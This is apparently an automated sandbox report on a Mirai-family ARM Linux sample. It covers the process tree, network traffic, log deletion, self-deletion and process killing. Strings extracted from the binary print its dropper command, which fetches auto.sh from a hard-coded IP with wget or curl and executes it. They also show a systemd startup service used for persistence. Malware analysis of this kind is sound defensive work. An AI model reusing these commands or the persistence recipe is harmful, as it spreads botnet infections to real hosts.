Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:	arm5.elf
Analysis ID:	1585056
MD5:	69a1790982af9b8302696a012e9fc07a
SHA1:	1c4f8ae74cd4778624ea58a826dfb3c7dd33979a
SHA256:	1b04a271136e186d32999cd8cb762e51c056620c4482668cd7efdb49cb6d4dbf
Tags:	elfMiraiuser-abuse_ch
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Deletes system log files

Manipulation of devices in /dev

Sample deletes itself

Sends malformed DNS queries

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585056
Start date and time:	2025-01-07 01:26:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm5.elf
Detection:	MAL
Classification:	mal72.troj.evad.linELF@0/4@54/0

Warnings

VT rate limit hit for: tcpdown.suo. [malformed]
VT rate limit hit for: tcpdown.su|1

Runtime Messages

Command:	/tmp/arm5.elf
PID:	5484
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	made you my bitch
Standard Error:

Process Tree

system is lnxubuntu20

arm5.elf (PID: 5484, Parent: 5402, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf

arm5.elf New Fork (PID: 5486, Parent: 5484)

arm5.elf New Fork (PID: 5488, Parent: 5486)

arm5.elf New Fork (PID: 5535, Parent: 5488)

arm5.elf New Fork (PID: 5537, Parent: 5488)

arm5.elf New Fork (PID: 5539, Parent: 5488)

arm5.elf New Fork (PID: 5545, Parent: 5488)

arm5.elf New Fork (PID: 5547, Parent: 5488)

arm5.elf New Fork (PID: 5556, Parent: 5488)

arm5.elf New Fork (PID: 5564, Parent: 5488)

arm5.elf New Fork (PID: 5566, Parent: 5488)

arm5.elf New Fork (PID: 5608, Parent: 5488)

arm5.elf New Fork (PID: 5610, Parent: 5488)

arm5.elf New Fork (PID: 5640, Parent: 5488)

arm5.elf New Fork (PID: 5643, Parent: 5488)

arm5.elf New Fork (PID: 5652, Parent: 5488)

arm5.elf New Fork (PID: 5661, Parent: 5488)

arm5.elf New Fork (PID: 5666, Parent: 5488)

arm5.elf New Fork (PID: 5671, Parent: 5488)

arm5.elf New Fork (PID: 5674, Parent: 5488)

arm5.elf New Fork (PID: 5682, Parent: 5488)

arm5.elf New Fork (PID: 5685, Parent: 5488)

arm5.elf New Fork (PID: 5697, Parent: 5488)

arm5.elf New Fork (PID: 5700, Parent: 5488)

arm5.elf New Fork (PID: 5711, Parent: 5488)

arm5.elf New Fork (PID: 5713, Parent: 5488)

arm5.elf New Fork (PID: 5722, Parent: 5488)

arm5.elf New Fork (PID: 5725, Parent: 5488)

arm5.elf New Fork (PID: 5735, Parent: 5488)

arm5.elf New Fork (PID: 5738, Parent: 5488)

arm5.elf New Fork (PID: 5750, Parent: 5488)

arm5.elf New Fork (PID: 5752, Parent: 5488)

arm5.elf New Fork (PID: 5762, Parent: 5488)

arm5.elf New Fork (PID: 5765, Parent: 5488)

arm5.elf New Fork (PID: 5773, Parent: 5488)

arm5.elf New Fork (PID: 5775, Parent: 5488)

arm5.elf New Fork (PID: 5778, Parent: 5488)

arm5.elf New Fork (PID: 5788, Parent: 5488)

arm5.elf New Fork (PID: 5796, Parent: 5488)

arm5.elf New Fork (PID: 5798, Parent: 5488)

arm5.elf New Fork (PID: 5806, Parent: 5488)

arm5.elf New Fork (PID: 5815, Parent: 5488)

arm5.elf New Fork (PID: 5818, Parent: 5488)

arm5.elf New Fork (PID: 5820, Parent: 5488)

arm5.elf New Fork (PID: 5828, Parent: 5488)

arm5.elf New Fork (PID: 5831, Parent: 5488)

arm5.elf New Fork (PID: 5490, Parent: 5486)

arm5.elf New Fork (PID: 5494, Parent: 5490)

arm5.elf New Fork (PID: 5492, Parent: 5486)

sh (PID: 5492, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 5496, Parent: 5492)

systemctl (PID: 5496, Parent: 5492, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

arm5.elf New Fork (PID: 5500, Parent: 5486)

sh (PID: 5500, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"

sh New Fork (PID: 5502, Parent: 5500)

systemctl (PID: 5502, Parent: 5500, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service

systemd New Fork (PID: 5498, Parent: 5497)

snapd-env-generator (PID: 5498, Parent: 5497, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5504, Parent: 5503)

snapd-env-generator (PID: 5504, Parent: 5503, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 5526, Parent: 1588)

sh (PID: 5526, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill

gsd-rfkill (PID: 5526, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill

gdm3 New Fork (PID: 5533, Parent: 1400)

Default (PID: 5533, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 5534, Parent: 1400)

Default (PID: 5534, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

systemd New Fork (PID: 5568, Parent: 1)

systemd-user-runtime-dir (PID: 5568, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm5.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: arm5.elf	ReversingLabs: Detection: 55%
Source: arm5.elf	Virustotal: Detection: 56%			Perma Link

Source: arm5.elf	String: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm5.elf	String: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: arm5.elf	String: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.dr	String: ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

Sends malformed DNS queries

Source: global traffic

DNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]

Source: global traffic	TCP traffic: 192.168.2.13:50380 -> 104.168.33.8:2601
Source: global traffic	TCP traffic: 192.168.2.13:52438 -> 107.175.130.16:7722

Source: /tmp/arm5.elf (PID: 5484)

Socket: 127.0.0.1:39123

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16

Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su\|1
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.suo. [malformed]

Source: startup_command.service.13.dr	String found in binary or memory: http://154.216.20.138/auto.sh
Source: arm5.elf, startup_command.service.13.dr	String found in binary or memory: http://154.216.20.138/auto.sh;

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sample	String containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: Initial sample	String containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 727, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 914, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 917, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 1805, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 2961, result: successful	Jump to behavior
Source: /tmp/arm5.elf (PID: 5490)	SIGKILL sent: pid: 5526, result: successful	Jump to behavior

Source: classification engine

Classification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

Manipulation of devices in /dev

Source: /tmp/arm5.elf (PID: 5488)

Deleted: /dev/kmsg

Jump to behavior

Source: /usr/libexec/gsd-rfkill (PID: 5526)	Directory: <invalid fd (9)>/..			Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5526)	Directory: <invalid fd (8)>/..			Jump to behavior

Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/238/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/239/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/119/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/3631/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/914/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/917/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/19/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/240/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/3095/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/241/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/242/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/244/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/245/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/125/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/246/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/5/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/247/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/7/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/129/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/8/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1906/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/802/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/3420/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1482/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/490/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1480/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/371/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/131/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1238/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/134/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/378/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/3413/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/258/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/259/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/936/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/30/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/816/cmdline	Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)	File opened: /proc/35/cmdline	Jump to behavior

Source: /tmp/arm5.elf (PID: 5492)	Shell command executed: sh -c "systemctl daemon-reload"			Jump to behavior
Source: /tmp/arm5.elf (PID: 5500)	Shell command executed: sh -c "systemctl enable startup_command.service"			Jump to behavior

Source: /bin/sh (PID: 5496)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload			Jump to behavior
Source: /bin/sh (PID: 5502)	Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes system log files

Source: /tmp/arm5.elf (PID: 5488)

Log files deleted: /var/log/kern.log

Jump to behavior

Sample deletes itself

Source: /tmp/arm5.elf (PID: 5484)

File: /tmp/arm5.elf

Jump to behavior

Source: /tmp/arm5.elf (PID: 5484)

Queries kernel information via 'uname':

Jump to behavior

Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: /arm/var/lib/vmware
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: P /var/lib/vmwareQ
Source: arm5.elf, 5484.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5535.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5537.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5539.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5545.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5547.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5556.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5564.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5566.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5608.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5610.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5640.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5643.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5652.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5661.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5666.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5671.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: /var/lib/vmware
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_727-4290690966
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: U/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQ
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: /var/lib/boltd8/var/lib/vmware<
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: ,/var/lib/vmwareD
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.uRTK8R:U
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: P /var/lib/vmware/VGAuthQ
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: U/arm/var/lib/vmwareA
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: U/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQ`!
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmp	Binary or memory string: $/tmp/vmware-root_727-4290690966
